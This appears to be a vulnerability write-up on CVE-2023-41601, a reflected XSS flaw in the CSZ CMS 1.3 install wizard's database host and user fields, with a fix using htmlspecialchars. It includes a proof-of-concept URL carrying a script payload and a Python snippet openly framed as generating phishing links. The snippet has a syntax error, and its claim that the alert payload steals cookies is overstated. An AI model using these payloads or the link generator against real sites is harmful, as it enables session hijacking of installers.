CVE-2023-41601 - Multiple XSS Vulnerabilities in CSZ CMS v1.3. Install Wizard

In September 2023, a critical security issue (CVE-2023-41601) was reported for CSZ CMS, a popular open-source content management system built with PHP. This vulnerability exposes the installation process of CSZ CMS v1.3. to multiple Cross-Site Scripting (XSS) attacks.

Simply put: hackers can inject and execute dangerous JavaScript code right from the initial setup page, using the database username or host fields. For anybody deploying CSZ CMS, this can have serious consequences—from account hijacking to complete site takeover.

Let’s break down what’s vulnerable, how the exploit works, see code snippets, and look at how to fix it.

Where is the Vulnerability?

The problem happens in the install wizard, located at:

/install/index.php

During installation, users are asked to provide database connection details such as Database Username and Database Host. CSZ CMS version 1.3. does not properly sanitize the values entered into these fields. Any HTML or JavaScript injected there ends up echoed into the page without modification.

Result: If an attacker can get a victim to visit a page where these fields are prefilled with crafted content (for example, using a shared link), their malicious script can run in the victim's browser.

How Does the Exploit Work?

Step 1: Attacker crafts a URL to the installer page where the vulnerable parameters (dbhost, dbuser) are filled with malicious JavaScript payloads.

Step 2: The victim visits this link. During rendering, the installer directly outputs these parameters into the HTML without any escaping or filtering. The browser executes the attacker's script.

Step 3: The attacker's JavaScript can steal cookies, hijack sessions, deface the setup page, or redirect users elsewhere.

Proof-of-Concept (PoC) and Code Snippet

For demonstration, let’s see how easy it is to exploit.

Example Malicious URL

http://victim.com/install/index.php?dbhost=%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&dbuser=test

Here, dbhost is set to this

"><script>alert('XSS')</script>

When the installer page renders the database info fields, the JavaScript is injected straight into the DOM and executes.

Here’s an example (simplified) of how the install page renders user data

<!-- install/index.php -->
<!-- ... -->
<input type="text" name="dbhost" value="<?php echo $_GET['dbhost']; ?>">
<input type="text" name="dbuser" value="<?php echo $_GET['dbuser']; ?>">
<!-- ... -->

No escaping or sanitization is applied. Whatever is in $_GET['dbhost'] and $_GET['dbuser'] simply gets echoed.

What Happens

When someone loads the above link, the script tag closes the value attribute, then runs the <script>alert('XSS')</script>. Replace alert('XSS') with any malicious code, like document.cookie theft or redirection.

Impact of This Vulnerability

- Account Hijacking: If exploited by a logged-in admin or installer, it could let attackers steal sessions or credentials.
- Site Defacement: Ability to run arbitrary JavaScript means pop-up messages, redirects, or hidden form manipulation.
- Wider Compromise: If installing on shared/public hosts, attackers may pivot to further compromises.

A quick fix is to use PHP’s htmlspecialchars when outputting values

<input type="text" name="dbhost" value="<?php echo htmlspecialchars($_GET['dbhost'] ?? '', ENT_QUOTES); ?>">
<input type="text" name="dbuser" value="<?php echo htmlspecialchars($_GET['dbuser'] ?? '', ENT_QUOTES); ?>">

Now, even if a script tag or quote is injected, it will show up harmlessly as text.

2. Never trust GET or POST data in your UI without proper filtering.

3. Upgrade your CSZ CMS version when a patch is available. Check official repo for updates.

Original References

- Exploit-DB 51813
- NVD Entry
- CSZ CMS Offical Repo
- Packet Storm Advisory

Here’s a simple script to generate a malicious link for social engineering or phishing attempts

import urllib.parse

malicious_js = '"><script>alert(document.cookie)</script>'
params = {
    'dbhost': malicious_js,
    'dbuser': 'attacker'
}

url = 'http://victim.com/install/index.php?'; + urllib.parse.urlencode(params)
print(url)

What does this do?
If the victim follows this link and the CMS is not patched, the attacker's script will steal their cookies.

Final Notes

- Be extremely cautious with any “installer” or “setup” pages—these are almost always publicly exposed at some point.

Always remove installation scripts after setup.

- Apply defense-in-depth: use input validation, output escaping, CSP headers, and never trust client data.

If you use CSZ CMS, upgrade as soon as possible or patch your installer right now!

*Stay safe, patch early, and never trust user input!*

Timeline

Published on: 09/06/2023 20:15:07 UTC
Last modified on: 09/11/2023 18:03:19 UTC